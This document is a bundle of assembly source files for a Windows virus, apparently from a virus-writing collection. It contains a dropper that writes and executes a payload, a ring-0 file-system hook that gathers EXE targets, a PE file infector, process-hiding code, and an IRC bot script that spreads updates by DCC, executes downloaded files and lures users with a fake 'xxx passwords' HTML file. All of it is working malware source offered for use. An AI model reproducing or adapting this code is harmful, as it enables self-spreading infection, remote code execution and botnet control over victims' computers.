ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[dropper\dropper.asm]ÄÄÄ includelib kernel32.lib includelib user32.lib includelib wsock32.lib .486 .model flat, stdcall include c:\masm\include\windows.inc VirusSize equ 11776 MessageBoxA PROTO ,:DWORD,:DWORD,:DWORD,:DWORD .code Main proc local lstrlen:dword local lstrcpy:dword local LocalAlloc:dword local LocalFree:dword local CreateFileA:dword local WriteFile:dword local CloseHandle:dword local GetSystemDirectoryA:dword local WinExec:dword call DropperStart DeltaSub: Virus: db VirusSize dup (90h) EndVirus: VirusName db "\DLLMgr.exe",0 GetProcAddressStr db "GetProcAddress",0 WinFunctions: lstrlenStr db "lstrlen",0 lstrcpyStr db "lstrcpy",0 LocalAllocStr db "LocalAlloc",0 LocalFreeStr db "LocalFree",0 CreateFileAStr db "CreateFileA",0 WriteFileStr db "WriteFile",0 CloseHandleStr db "CloseHandle",0 GetSystemDirectoryAStr db "GetSystemDirectoryA",0 WinExecStr db "WinExec",0 db 0 ; pointers to these DropperStart: pop edi sub edi,DeltaSub mov eax,[ebp+4] and eax,0fffff000h ; even 1000h something FindKernelEntry: sub eax,1000h cmp word ptr [eax],'ZM' jnz FindKernelEntry mov ebx,[eax+3ch] cmp word ptr [ebx+eax], 'EP' jne FindKernelEntry mov ebx,[eax+120+ebx] add ebx,eax ; ebx -> Export table mov ecx,[ebx+12] ; ecx -> dll name cmp dword ptr [ecx+eax],'NREK' jnz FindKernelEntry ; We can now be sure that eax points to the kernel FindGetProcAddress: push edi lea edi,[GetProcAddressStr+edi] mov edx,[ebx+32] FindFunction: add edx,4 mov ecx,15 ; length of GetProcAddress,0 mov esi,[edx+eax] push edi add esi,eax repz cmpsb pop edi jne FindFunction pop edi sub edx,[ebx+32] shr edx,1 ; ecx = ordinal pointer lea esi,[edx+eax] xor ecx,ecx add esi,[ebx+36] ; esi = base+ordinals+ordnr mov cx,word ptr [esi] ; ecx = ordinal shl ecx,2 ; ecx = ordinal*4 add ecx,[ebx+28] ; ecx = ordinal*4+func tbl addr mov ebx,[ecx+eax] ; esi = function addr in file add ebx,eax ; esi = function addr in mem ; eax -> ModuleHandle ; ebx -> GetProcAddress mov esi,eax push edi lea edi,[WinFunctions+edi] push 0 CopyWinApiFunctions: push edi push esi call ebx pop ecx mov [lstrlen+ecx*4],eax dec ecx push ecx push edi call lstrlen inc eax add edi,eax cmp byte ptr [edi],0 jnz CopyWinApiFunctions NoMoreApis: pop ecx pop edi push 400 ; space for GetSystemDir push LMEM_ZEROINIT call LocalAlloc push eax ; Variables for LocalFree push SW_SHOW ; Variables for WinExec push eax push 0 ; Variables for CreateFileA push 0 push CREATE_NEW push 0 push 0 push GENERIC_WRITE push eax ; push -> SystemDir push 350 push eax call GetSystemDirectoryA add eax,[esp] ; add with SystemDir lea ebx, [VirusName+edi] ; ebx -> VirusName push ebx push eax call lstrcpy call CreateFileA inc eax jz ErrorOpening dec eax push eax ; push fileptr push 0 lea ebx,lstrlen push ebx push VirusSize add edi,Virus push edi ; edi -> Virus push eax call WriteFile call CloseHandle ; fileptr on stack call WinExec ; variables on stack ErrorOpening: call LocalFree ; ptr to Mem on stack ret Main endp EndMain: invoke MessageBoxA, 0, 0, 0, 0 end Main ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[dropper\dropper.asm]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FileSeeker\resident.asm]ÄÄÄ includelib kernel32.lib includelib user32.lib includelib wsock32.lib .486 .model flat, stdcall include c:\masm\include\windows.inc include c:\masm\include\wsock32.inc include c:\masm\include\kernel32.inc include c:\masm\include\user32.inc NewIFSMgrSize equ NewIFSMgrEnd-NewIFSMgr IFSMgr equ 0040h GetHeap equ 000dh FreeHeap equ 000eh Ring0_FileIO equ 0032h InstallFileSystemAPIhook equ 0067h UniToBCSPath equ 0041h R0_OPENCREATFILE equ 0D500h ; Open/Create a file R0_READFILE equ 0D600h ; Read a file, no context R0_WRITEFILE equ 0D601h ; Write to a file, no context R0_CLOSEFILE equ 0D700h IFSFN_FILEATTRIB equ 33 IFSFN_OPEN equ 36 IFSFN_RENAME equ 37 IFSFN_READ equ 0 ; read a file IFSFN_WRITE equ 1 ; write a file .data Kernel32 db "kernel32",0 MemPtr dd 0 Temp dd 0 DataSize dd 0 FullListFilename db 300 dup (0) EndListFilename db "\listfile.txt",0 .code GetResident: invoke GetModuleHandle, offset Kernel32 add eax,6ch mov ebx,'WORM' cmp [eax],ebx jz DontGoRing0 mov edi, eax sub esp,8 sidt [esp] ; get interupt table ; hook int 3 to get get ring 0 mov esi,[esp+2] add esi, 3*8 ; pointer to int 3 mov ebx, [esi+4] mov bx,word ptr [esi] ; ebx = old pointer mov eax,offset Ring0Code ; eax = new pointer mov word ptr [esi],ax ; move new pointer to int 3 shr eax,16 mov word ptr [esi+6], ax pushad int 3 ; get into ring 0 popad mov [esi],bx ; return old pointer again shr ebx,16 mov [esi+6],bx add esp,8 DontGoRing0: ret ; --------------------------------------- ; -------------------------------- Ring 0 ; --------------------------------------- vxdcall macro vxd_func int 20h dw vxd_func dw IFSMgr endm Ring0Code: mov ebx,'WORM' mov [edi],ebx mov eax, NewIFSMgrSize+50000 push eax vxdcall GetHeap pop ecx test eax,eax jz ErrorRing0 ; Copy guide and decryptor to ring 0 mem sub ecx, 50000 mov edi, eax mov esi, NewIFSMgr rep movsb sub edi, 8 mov esi, MemPtr mov ecx, DataSize rep movsb mov edi, eax sub edi, NewIFSMgr add edi, offset ListFilename lea esi, FullListFilename mov ecx, dword ptr [EndListFilename] rep movsb push eax vxdcall InstallFileSystemAPIhook pop edi sub edi,NewIFSMgr mov [edi+BasePtr+1],edi mov [edi+OldIFSMgr],eax ErrorRing0: iretd NewIFSMgr: push ebx BasePtr: mov ebx,66666666h xor eax,eax inc eax cmp [Flag+ebx],eax jz FileFunctionActive mov [Flag+ebx],eax mov eax,[esp+12] cmp eax,IFSFN_OPEN jz CheckFilename cmp eax,IFSFN_FILEATTRIB jz CheckFilename cmp eax,IFSFN_RENAME jnz FileFunctionEnd CheckFilename: mov eax,[esp+16] test eax,eax jz FileFunctionEnd cmp eax,25 ja FileFunctionEnd add eax,'A'-1+':'*256 mov ecx,[esp+28] push esi push edi lea esi,[FileToInfect+ebx] mov word ptr [esi],ax inc esi inc esi mov eax,[ecx+12] add eax,4 push 0 push 250 push eax push esi vxdcall UniToBCSPath add esp,16 xor edx,edx mov [esi+eax],edx mov [esi+eax+4],edx cmp dword ptr [esi+eax-4],'EXE.' jne FileFunctionEndPop dec esi dec esi lea ecx,[eax+3] ; ecx -> strlen+1 push ecx push esi HashValue: lodsb and al,00011111b ; al = 0 -> 31 add edx, eax rol edx, cl loop HashValue pop esi mov ecx,[HashCount+ebx] inc ecx pop eax cmp ecx,990 jae FileFunctionEndPop lea edi, [ebx+Hashes-4] LocateSameString: add edi,4 cmp [edi],edx jz FileFunctionEndPop dec ecx jnz LocateSameString mov ecx,eax xchg edi,ebx pushad mov eax,R0_OPENCREATFILE push 2 pop ebx xor ecx,ecx push 17 pop edx lea esi, [ListFilename+edi] call Ring0_File_IO mov [MovEbxFileHandle+edi+1],eax popad jc FileFunctionEndPopRetEbx mov [ebx],edx push ebx ; ebx -> Hash lea ecx,[edi+HashCount] sub ebx,ecx push ebx ; ebx -> Hash in file MovEbxFileHandle: mov ebx,10101010h push eax push esi push eax mov eax,R0_READFILE mov ecx, 12 xor edx, edx lea esi, [HashCount+edi] call Ring0_File_IO pop eax inc dword ptr [esi] push [esi+4] ; push end of file add [esi+4],eax mov eax,R0_WRITEFILE mov ecx,12 xor edx,edx call Ring0_File_IO pop edx ; end of file pop esi ; esi -> FileName pop ecx ; filename length mov eax,R0_WRITEFILE call Ring0_File_IO pop edx ; where in file to write pop esi ; hash value mov ecx,4 mov eax,R0_WRITEFILE call Ring0_File_IO mov eax,R0_CLOSEFILE call Ring0_File_IO FileFunctionEndPopRetEbx: mov ebx,edi FileFunctionEndPop: pop edi pop esi FileFunctionEnd: xor edx,edx mov [Flag+ebx],edx FileFunctionActive: mov eax,[OldIFSMgr+ebx] mov ecx,ebx pop ebx pop [ReturnFromHook+ecx] lea edx,[ReturnFromHook+ecx+4] sub [ReturnFromHook+ecx],edx call dword ptr [eax] db 0e9h ReturnFromHook: dd 0 jmp eax Ring0_File_IO: vxdcall Ring0_FileIO ret OldIFSMgr dd 0 Flag dd 0 ListFilename db 300 dup (0) FileToInfect db 300 dup (0) ListFileData: HashCount dd 0 NamesPtr dd 4000 NamesBegin dd 0 Hashes: NewIFSMgrEnd: KernelName db "kernel32",0 Main: invoke GetModuleHandleA, offset KernelName cmp eax,0bff70000h jnz Error invoke GetCurrentDirectory, 270, offset FullListFilename add eax,offset FullListFilename invoke lstrcpy, eax, offset EndListFilename invoke lstrlen, offset FullListFilename mov dword ptr [EndListFilename], eax xor esi,esi invoke CreateFileA, offset FullListFilename, GENERIC_READ+GENERIC_WRITE, esi, esi, OPEN_ALWAYS, esi, esi mov ebx,eax inc eax jz Error invoke GetFileSize, ebx, esi .if eax == 0 mov eax,offset ListFileData mov MemPtr, eax invoke WriteFile, ebx, eax, 12, offset Temp, esi .else mov DataSize, eax push esi push offset Temp push eax invoke LocalAlloc, LMEM_ZEROINIT, eax mov MemPtr, eax push eax push ebx call ReadFile .endif invoke CloseHandle, ebx call GetResident Error: invoke ExitProcess,0 end Main ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FileSeeker\resident.asm]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FileSeeker\speedy.asm]ÄÄÄ includelib kernel32.lib includelib user32.lib includelib wsock32.lib .486 .model flat, stdcall include c:\masm\include\windows.inc include c:\masm\include\wsock32.inc include c:\masm\include\kernel32.inc include c:\masm\include\user32.inc ShortString struct dword FileName BYTE 8 dup (?) ShortString ends APPLOG_FILE_HEADER struct dword FileName byte 8 dup (?) PathOffset dword ? NoOfRunsSinceDefrag word ? NoOfRuns word ? FileDataTime FILETIME <> ; relative to what? FileSize dword ? Flags dword ? ; Dont know anything about ; this either APPLOG_FILE_HEADER ends LISTFILE_HEADER struct dword HashCount dword ? ; Number of found files NamesEnd dword ? ; Pointer where to write ; new filenames NamesBegin dword ? ; Where the names begin LISTFILE_HEADER ends .data ListFilePtr dd 0 ListFileName db "listfile.txt",0 ApplogFilename db "\applog\applog.ind",0 Temp dd 0 .code MyOpenFile: xor edx,edx invoke CreateFileA, eax, ebx, edx, edx, ecx, edx, edx mov ebx,eax cmp eax,INVALID_HANDLE_VALUE ret MyReadFile proc Filename:dword, MemPtr:dword pushad xor esi,esi mov eax,Filename mov ebx,GENERIC_READ mov ecx,OPEN_EXISTING call MyOpenFile jz Error push eax ; CloseHandle push esi ; ReadFile, 0 push offset Temp ; ReadFile, Bytes Read mov edi,eax invoke GetFileSize, eax, esi push eax ; ReadFile, How much to read add eax,10 ; allocate 10+FileSize bytes invoke LocalAlloc, LMEM_ZEROINIT, eax mov ecx,MemPtr mov [ecx],eax push eax ; ReadFile, Where to read it push edi ; ReadFile, File Handle call ReadFile call CloseHandle popad ret MyReadFile endp AddStringToFilelist proc uses ebx Filename:dword mov eax,Filename mov ebx,GENERIC_READ mov ecx,OPEN_EXISTING call MyOpenFile ; open the file jz FoundNoFile ; Resident infector will then ; infect the file invoke CloseHandle, ebx FoundNoFile: ret AddStringToFilelist endp CreateDirListing proc uses ebx esi edi local FileMem:dword local Files:dword local ApplogWholeFileName:dword local ApplogFileStr:ShortString invoke LocalAlloc, LMEM_ZEROINIT, 300 mov ebx, eax invoke GetWindowsDirectory, ebx, 300 add eax, ebx invoke lstrcpy, eax, offset ApplogFilename lea esi, FileMem invoke MyReadFile, ebx, esi invoke LocalFree, ebx mov esi, [esi] mov eax,'LPPA' ; is this really applog.ind cmp [esi],eax jnz Error invoke LocalAlloc, LMEM_ZEROINIT, 300 mov edi, eax mov ebx, [esi+10h] ; number of files on system mov Files, ebx add esi, 64+344 ; esi -> filenames assume esi:ptr APPLOG_FILE_HEADER FindFilesLoop: mov eax,[esi].PathOffset ; more relative pointer ; to path to eax mov ecx,Files imul ecx,ecx,20h ; ecx = FILE_ENTRY_STRUCTs add ecx,FileMem ; size lea eax,[64+344+ecx+eax] ; make relativ pointer into ; real offset ; eax = Relative pointer + ; First and second header + ; File entries structures = ; pointer to path invoke lstrcpy, edi, eax ; copy path to edi invoke lstrlen, eax add eax, edi mov byte ptr [eax],'\' inc eax invoke lstrcpyn, eax, esi, 9 ; copy filename to edi invoke lstrlen, edi mov ecx,'EXE.' mov [eax+edi],ecx xor ecx,ecx mov byte ptr [eax+edi+4],cl invoke AddStringToFilelist, edi ; replace with infect ; procedure in your virus add esi, sizeof(APPLOG_FILE_HEADER) dec ebx jnz FindFilesLoop invoke LocalFree, FileMem ret CreateDirListing endp Kernel32 db "kernel32",0 RegisterService db "RegisterServiceProcess", 0 HideProgram: invoke GetModuleHandleA, offset Kernel32 invoke GetProcAddress, eax, offset RegisterService test eax,eax jz NoHide push 1 push 0 call eax NoHide: ret Main: call HideProgram call CreateDirListing Error: invoke ExitProcess, 0 end Main ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FileSeeker\speedy.asm]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[htmldropper\dropper.html]ÄÄÄ -->'s

XXX passwords

www.pussysex.com

Name: Jones
Pass: Jones

www.teensexxx.com

Name: qwerty
Pass: qwerty

www.analpleasure.com

Name: anal
Pass: anal

www.hornybabes.com

Name: naked
Pass: sex

www.loveland.com

Name: htroe
Pass: eerss




















ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[htmldropper\dropper.html]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[infector\infector.asm]ÄÄÄ includelib kernel32.lib includelib user32.lib includelib wsock32.lib .486 .model flat, stdcall include c:\masm\include\windows.inc include c:\masm\include\wsock32.inc include c:\masm\include\kernel32.inc include c:\masm\include\user32.inc PE_Objects equ 6 PE_NTHdrSize equ 20 PE_Entrypoint equ 40 PE_ImageBase equ 52 PE_ObjectAlign equ 56 PE_FileAlign equ 60 PE_ImageSize equ 80 Obj_Name equ 0 Obj_VirtualSize equ 8 Obj_VirtualOffset equ 12 Obj_PhysicalSize equ 16 Obj_PhysicalOffset equ 20 Obj_Flags equ 36 .data DropperFilename db "dropper.exe",0 FilelistFilename db "listfile.txt",0 Dropper dd 0 Filelist dd 0 Temp dd 0 DropperSize dd 0 DropperMem dd 0 FilelistMem dd 0 FileHandle dd 0 .code Kernel32 db "kernel32",0 RegisterService db "RegisterServiceProcess", 0 HideProgram: invoke GetModuleHandleA, offset Kernel32 invoke GetProcAddress, eax, offset RegisterService test eax,eax jz NoHide push 1 push 0 call eax NoHide: ret MyOpenFile: xor edx,edx invoke CreateFileA, eax, ebx, edx, edx, ecx, edx, edx cmp eax,INVALID_HANDLE_VALUE ret MyReadFile proc Filename:dword, MemPtr:dword pushad xor esi,esi mov eax,Filename mov ebx,GENERIC_READ mov ecx,OPEN_EXISTING call MyOpenFile jz Error push eax ; CloseHandle push esi ; ReadFile, 0 push offset Temp ; ReadFile, Bytes Read mov edi,eax invoke GetFileSize, eax, esi push eax ; ReadFile, How much to read add eax,10 ; allocate 10+FileSize bytes invoke LocalAlloc, LMEM_ZEROINIT, eax mov ecx,MemPtr mov [ecx],eax push eax ; ReadFile, Where to read it push edi ; ReadFile, File Handle call ReadFile call CloseHandle popad ret MyReadFile endp Setup: lea ebx,Filelist invoke MyReadFile, offset FilelistFilename, ebx mov ebx,[ebx] mov FilelistMem, ebx add ebx,[ebx+8] add ebx,4000 mov Filelist, ebx lea ebx,Dropper invoke MyReadFile, offset DropperFilename, ebx mov ebx,[ebx] mov DropperMem, ebx add ebx,[ebx+3ch] xor ecx,ecx mov cx,[ebx+PE_NTHdrSize] ; HdrSize lea eax,[ebx+24+ecx-40] ; eax -> obj table FindCodeSegmentLoop: add eax,8*5 cmp dword ptr [eax],'xet.' jnz FindCodeSegmentLoop push [eax+Obj_PhysicalSize] pop DropperSize mov eax,[eax+Obj_PhysicalOffset] add Dropper, eax ret Error: invoke ExitProcess, 0 ObjectAlign: mov ecx,[edi+PE_ObjectAlign] ; calculate new virtual size XAlign: xor edx,edx div ecx inc eax cdq mul ecx ret InfectFile proc Filename:dword local WhereToWriteDropper:dword pushad xor esi,esi mov eax,Filename mov ebx,'NIW\' cmp [eax+2],ebx jz InfectionFailed mov ebx,GENERIC_READ or GENERIC_WRITE mov ecx,OPEN_EXISTING call MyOpenFile jz InfectionFailed mov FileHandle, eax invoke GetFileSize, eax, esi ; dont infect small files mov edi,3000 cmp eax,edi jl InfectionFailedCloseHandle sub esp,edi ; alloc 3000 bytes from stack mov ebx,esp invoke ReadFile, FileHandle, ebx, edi, offset Temp, esi cmp word ptr [ebx],'ZM' jnz InfectionFailedAddStack mov eax,[ebx+3ch] cmp eax, 2800 ; dont infect if header is ja InfectionFailedAddStack ; > 2800 bytes in file push eax add ebx,eax movsx eax,word ptr [ebx+PE_Objects] imul eax,eax,40 add ax,word ptr [ebx+PE_NTHdrSize] ; eax = Size of header lea ebx,[eax+24] ; ebx = Full header size pop eax add esp,edi ; dealloc mem from stack cmp ebx,edi ja InfectionFailedCloseHandle ; dont infect if header is ; bigger then 3000 bytes push esi ; SetFilePtr, FILE_BEGIN push esi ; SetFilePtr, 0 push eax ; SetFilePtr, PE_Start invoke SetFilePointer, FileHandle, eax, esi, esi invoke LocalAlloc, LMEM_ZEROINIT, ebx ; alloc mem for header mov edi, eax ; edi -> PE header push ebx ; Size of header invoke ReadFile, FileHandle, eax, ebx, offset Temp, esi lea ebx,[edi+ebx-40] ; ebx -> last object mov eax, 'ler.' cmp [ebx], eax ; is last segment .reloc jnz NotReloc mov [ebx+Obj_PhysicalSize],esi ; no size mov [ebx+Obj_VirtualSize],esi ; no size NotReloc: mov eax,DropperSize add eax,20 push eax ; WriteFile mov ecx,[ebx+Obj_PhysicalSize] add eax,ecx ; eax = New physical size mov edx,ecx add ecx,[ebx+Obj_PhysicalOffset] ; ecx -> Where to write virus mov WhereToWriteDropper, ecx add edx,[ebx+Obj_VirtualOffset] ; edx -> New RVA xchg edx,[edi+PE_Entrypoint] ; set new RVA mov esi, Dropper add edx,[edi+PE_ImageBase] mov [esi+11], edx ; save old RVA push eax call ObjectAlign ; calculate new virtual size lea ecx,[ebx+Obj_VirtualSize] cmp [ecx],eax ja DontChangeVirtualSize ; dont change it if existing mov [ecx],eax ; is bigger DontChangeVirtualSize: pop eax ; new size of last segment mov ecx,[edi+PE_FileAlign] ; calculate new physical size call XAlign mov [ebx+Obj_PhysicalSize],eax pop eax ; calculate new image size add eax,[edi+PE_ImageSize] call ObjectAlign mov [edi+PE_ImageSize], eax pop ebx ; header size push FileHandle call SetFilePointer invoke WriteFile, FileHandle, edi, ebx, offset Temp, 0 mov ebx,FileHandle invoke LocalFree, edi ; free allocated mem mov edi, eax ; edi = 0 invoke SetFilePointer, ebx, WhereToWriteDropper, edi, edi invoke WriteFile, ebx, esi, DropperSize, offset Temp, edi jmp InfectionFailedCloseHandle InfectionFailedAddStack: add esp, 3000 InfectionFailedCloseHandle: invoke CloseHandle, FileHandle InfectionFailed: popad ret InfectFile endp Main: call HideProgram xor eax,eax call Setup mov ebx,10 ; infect 10 files mov esi,Filelist InfectionLoop: invoke lstrlen, esi test eax,eax jz Return inc eax push esi add esi, eax call InfectFile dec ebx jnz InfectionLoop jmp FileOpenNoSleep FileOpenLoop: invoke Sleep, 1000 ; sleep for one second FileOpenNoSleep: mov eax,offset FilelistFilename mov ebx,GENERIC_WRITE mov ecx,OPEN_ALWAYS call MyOpenFile jz FileOpenLoop mov ebx, eax invoke GetFileSize, eax, 0 test eax,eax jz WriteDefaultData xor edi, edi invoke SetFilePointer, ebx, 8, edi, edi push 0 mov eax,esp lea ecx,[esi-4000] sub ecx,FilelistMem push ecx mov ecx, esp invoke WriteFile, ebx, ecx, 4, eax, 0 pop eax pop eax invoke CloseHandle, ebx invoke Sleep, 1000*60*2 ; sleep for 2 minutes mov ebx,10 jmp InfectionLoop WriteDefaultData: push 0 mov eax,esp ; eax = BytesWritten push 0 push 4000 push 0 mov ecx, esp ; ecx = What to write invoke WriteFile, ebx, ecx, 12, eax, 0 add esp, 16 invoke CloseHandle, ebx Return: invoke LocalFree, FilelistMem invoke LocalFree, DropperMem mov eax,offset FilelistFilename mov ebx,GENERIC_WRITE mov ecx,OPEN_ALWAYS call MyOpenFile jz QuitError mov ebx, eax xor esi, esi invoke SetFilePointer, ebx, 4, esi, esi push 0 push 4000 mov ecx, esp invoke WriteFile, ebx, ecx, 8, offset FilelistMem, esi pop edi ; edi = 4000 ; pop eax ; eax = 0 ; push esi push ebx call GetFileSize cmp eax,edi jl QuitError sub eax,edi push esi ; WriteFile, 0 push offset FilelistMem ; WriteFile, BytesWritten push eax ; WriteFile, BytesToWrite invoke LocalAlloc, LMEM_ZEROINIT, eax push eax ; WriteFile, Buffert push ebx ; WriteFile, FileHandle xchg edi, eax ; edi = Alloc mem, eax = 4000 invoke SetFilePointer, ebx, eax, esi, esi call WriteFile invoke CloseHandle, ebx invoke LocalFree, edi QuitError: invoke ExitProcess, 0 end Main ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[infector\infector.asm]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ircbot\ircbot.asm]ÄÄÄ ; after compiling, open ircbot.exe, go to offset 2 (right after MZ) and write ''s" db '

XXX passwords

www.pussysex.com

Name: Jones
Pass: Jones

' db 'www.teensexxx.com

Name: qwerty
Pass: qwerty

www.analpleasure.com

Name: anal
Pass: anal' db '

www.hornybabes.com

Name: naked
Pass: sex

www.loveland.com' db '

Name: htroe
Pass: eerss




















' db '',0dh,0ah _rsrc ends end Main ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ircbot\ircbot.asm]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ircbot\script.asm]ÄÄÄ ; Main script, establich the contact between the new viruses. ; ; What happens when a new virus connects ; Step 1. On connect. ; SEND Nickname ; USER Ident . . :Realname ; Step 2. When connected ; Check if leader is online ; Step 3. If Leader is offline ; New leader is God ; Goto step 2 ; Step 4. If leader is online ; Send "Hello master" ; Step 5. At Reply = "Hello child" ; Send "Do you have place for me?" ; Step 6. At Reply = "No, ask X" ; Change Leader to X ; Goto step 4 ; Step 7. At Reply = "SEND: X" ; Check if file X exist ; If file doesnt exist, send "DCC X" ; Step 8. At Reply = 01,"DCC" ; Recieve the file and execute it ; What happens at the Leader side of the connection (the virus that is ; connected to the newly connected virus) ; Step 11. At Recieved = "Hello master" ; Send "Hello child" ; Step 12. At Recieved = "Do you have place for me?" ; Look how many slaves that it currently has ; Step 13. If Slave list if full (more then five slaves) ; Send "No, ask SlaveX" ; Step 14. If slave list isnt full ; Add new virus to slave list ; Send list of files ; Step 15. At Recieved = "DCC X" ; Open a DCC connection and send a CTCP DCC reply to virus ; This is the basics for a connection, if we want to upgrade the virus we ; just DCC it a file and it will download it and execute it. This virus will ; then send this program to every new virus at Step 14. These viruses will ; also send it further, so we get a whole branch that all has this program. ; God ; 1 ( 2 3 4 5 ) ; I DCC a new file to this virus -> 1 ( 2 3 4 5 ) ; All these will have the file 1 2 3 4 5 ; too if they connected to IRC ; after i DCC'ed the new program ; The viruses regulary check to see if all slaves and its leader is online ; if the leader is gone it goes to step 3. If a slave is missing then it is ; deleted from the slave list. ; commands marked with three stars (***) are considered dangerous in the way ; that it would be easy for the AV's to find all viruses. Delete for less fun ; and more security includelib kernel32.lib includelib user32.lib .486 .model flat, stdcall include c:\masm\include\windows.inc include c:\masm\include\kernel32.inc include c:\masm\include\user32.inc NULL equ 0 EndOfList equ 0 NoScan equ 1 ConnectFunction equ 1 DCCRecvFunction equ 2 DCCChatFunction equ 3 DCCSendFunction equ 4 QuitFunction equ 5 NewSlaveFunctions equ 6 ShouldRecieveProgram equ 7 GenerateNewNick equ 8 ExecuteProgram equ 9 DirFunction equ 10 .code BeginOfScript: Header: Magic db "VIRc" Alignment dd -401000h User dd Userinfo Slaves dd SlaveNames Ignores dd IgnoreNames IRCServers dd IPList MessageParsePtr dd MessageParseData DownloadedFiles dd ListOfDownloadedFiles EndOfHeader: ; ---------------------------------------------- User info Userinfo: Nickname db "Vir00002" db 10-($-Nickname) dup (0) Ident db "Nick" db 10-($-Ident) dup (0) RealName db "DrSolomon" db 10-($-RealName) dup (0) God db "VirusGod" db 10-($-God) dup (0) Leader db "VirusGod" db 10-($-Leader) dup (0) db EndOfList SlaveNames: db 10 dup (0) db 10 dup (0) db 10 dup (0) db 10 dup (0) db 10 dup (0) db EndOfList IgnoreNames: db 50 dup (0) db EndOfList ; ----------- List of IP addresses of undernet IRC servers IPList db "192.160.127.97",0 db "130.243.35.1",0 ; efnet db "203.37.45.2",0 db "209.47.75.34",0 db "195.154.203.241",0 db "194.159.80.19",0 db "128.138.129.31",0 db EndOfList db 0 ; -------------- How to handle messages MessageParseData: db NoScan db "|$0 ",2 dd RealStart db EndOfList RealStart: db "$0 NICK",0 db "|$1:",2 dd NickChangeProc db "$0 PRIVMSG",0 db "|$1 ",2; split $1 at space until ; two new strings is created dd PrivMsgData db "$0 001",0 ; First message db "l" dd StartCommands db "$0 303",0 db "l" dd IsOnMessage db "$0 JOIN",0 db "|$1:",2 dd JoinMessage db "$0 319",0 ; WHOIS channels db "|$1:",2 dd JoinWhoisChannels ; Low level commands db "$0 433",0 db "f" dw GenerateNewNick db "$0 PING",0 db "l" dd PingList db "$0 ERROR",0 db "f" dw ConnectFunction db EndOfList JoinWhoisChannels: db "$2 #",0 db "l" dd JoinChannel db "$4 #",0 db "|$4#",2 dd SecondChannel db EndOfList SecondChannel: db NoScan db "|$5 ",2 dd SecondChannel2 db EndOfList SecondChannel2: db NoScan db "s" db "JOIN #$5",0 db EndOfList PingList: db NoScan db "s" db "PONG $1",0 ; check if all is online db NoScan db "s" db "ISON $slave1 $slave2 $slave3 $slave4 $slave5 $leader",0 db EndOfList NickChangeProc: db "$nick $mynick",0 db "v" db "$mynick $2",0 db EndOfList JoinMessage: db "!$nick $mynick",0 db "l" dd SendFileToJoiner db EndOfList SendFileToJoiner: db NoScan db "v" db "$3 xxxpasswords.html",0 db NoScan db "f" dw DCCSendFunction db EndOfList ; ------------------------------------ Handler of PRIVMSGs PrivMsgData: db NoScan db "v" db "$recv $1",0 db "$1 $mynick",0 ; if where to send = mynick db "v" ; change that variable db "$recv $nick",0 ; to $nick. This happens ; at private msgs db "$nick $leader",0 ; messages from the leader db "l" dd LeaderMessages db "$slaves $nick",0 db "l" dd SlaveMessages db "$nick Bhunji",0 db "l" dd NickIsBhunji db "!$nick $mynick",0 ; parse if ordinary user db "l" dd UserMessages db EndOfList UserMessages: db "!$nick $leader",0 ; parse if ordinary user db "l" dd UserMessages2 db EndOfList UserMessages2: db "!$nick $child",0 ; parse if ordinary user db "l" dd UserMessages3 db EndOfList UserMessages3: db "$2 :DCC script.exe",0 db "l" dd SendScript db "$2 :Hello master",0 ; Is message = Hello master db "l" dd NewVirusOnline db "$2 :Do you have place for me?",0 db "f" dw NewSlaveFunctions db "!$recv #",0 ; is a private message db "s" db "WHOIS $recv",0 ; join all channels that ; the sender is visiting JoinChannel: db "$2 #",0 ; look for a # db "|$2#",2 ; split string at # dd ParseChannel db EndOfList ParseChannel: db NoScan db "|$3 ",2 ; split string at space dd JoinNewChannel db EndOfList JoinNewChannel: db NoScan db "s" db "JOIN #$3",0 db EndOfList NewVirusOnline: db NoScan db "s" ; if so, Send string db "$0 $recv :Hello child",0 ; $0 